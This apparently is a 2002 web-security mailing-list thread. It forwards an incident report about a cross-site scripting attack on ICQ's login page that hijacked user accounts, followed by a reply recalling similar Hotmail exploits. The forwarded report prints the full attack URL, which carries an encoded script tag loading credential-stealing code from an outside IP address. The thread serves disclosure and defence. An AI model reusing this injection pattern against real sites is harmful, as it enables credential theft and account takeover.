Re: Top Ten Web App Sec Problems

["Alex Lambert" <alambert () webmaster com>]

Here's one from incidents/bugtraq today:

From: "Rafael Coninck Teigao" <rafael () SafeCore NET>
To: "SecurityFocus - Bugtraq" <bugtraq () securityfocus com>; "Security Focus'
INCIDENTS" <INCIDENTS () securityfocus com>
Sent: Monday, December 02, 2002 10:29 AM
Subject: [Fwd: XSS on ICQ leading to password compromise]


> Moderator:
> I've sent the following email to bugtraq last week. Haven't seen it on
> the list, but it came to my attention that even more account's were
> hijacked this way.
> I'm also sending this to incidents, because I think that maybe some
> administrators are receiving similar complaints from their users and
> could (perhaps) block the XSS pages somehow.
>
> -------- Original Message --------
> From: Rafael Coninck Teigao <rafael () SafeCore NET>
> Subject: XSS on ICQ leading to password compromise
> To: SecurityFocus - Bugtraq <bugtraq () securityfocus com>
> CC: horvath () avalon sul com br, ahi () TELEFONICAEMPRESAS NET BR,nbso () nic br
>
> Hello, pp.
>     I've tried to find some representative from de ICQ technical staff
> but had no success so far.
>     Anyway, here's what's happening:
>     A friend of mine got the following address on his ICQ from a friend
> on his contact list:
http://web.icq.com/login/login_page/1,,err_sys_busy,00.html?karma_err_msg=<s
cript%20src="%68%74%74%70%3A%2F%2F200%2E158%2E50%2E245%2Fweb%2Ficq%2Easa"%3E
</script%3e
> we can clearly see the <script... part on it. Unfortunately, he
> couldn't.
>     When the page opened, he typed his email address and password. Five
> minutes later he was disconnected from ICQ and was unable to login
> again.
>     He then tried to recover his password and saw that it was set to:
> aaaaa
> a
>     that's right, it has a new line on it.
>     The source on the script is:
> http://200.158.50.245/web/icq.asa
>     That IP address comes from an ADSL from Telesp. The date and time of
> the incident were Nov/24 at 20:12 (GMT -2).
>
>     He also told me that the friend who sent him the address and another
> person had their accounts hijacked as well.
>
>     Best regards,
>     Rafael Coninck Teigao
>     SafeCore Network Solutions
>     http://SafeCore.NET
>     +55 41 224 1785
>
> --
*snipped footers*

apl

----- Original Message -----
From: "Kevin Spett" <kspett () spidynamics com>
To: "Richard M. Smith" <rms () computerbytesman com>;
<webappsec () securityfocus com>
Sent: Monday, December 02, 2002 5:28 PM
Subject: Re: Top Ten Web App Sec Problems


> There have been a number of publicized Hotmail problems that were being
> exploited.  This was back when you could send scripted content in an email
> message and it would get executed.  You would open your mail, it'd pop up
a
> window saying "Oh, I'm sorry you'll have to log in again" or something.
>
>
>
> Kevin Spett
> SPI Labs
> http://www.spidynamics.com/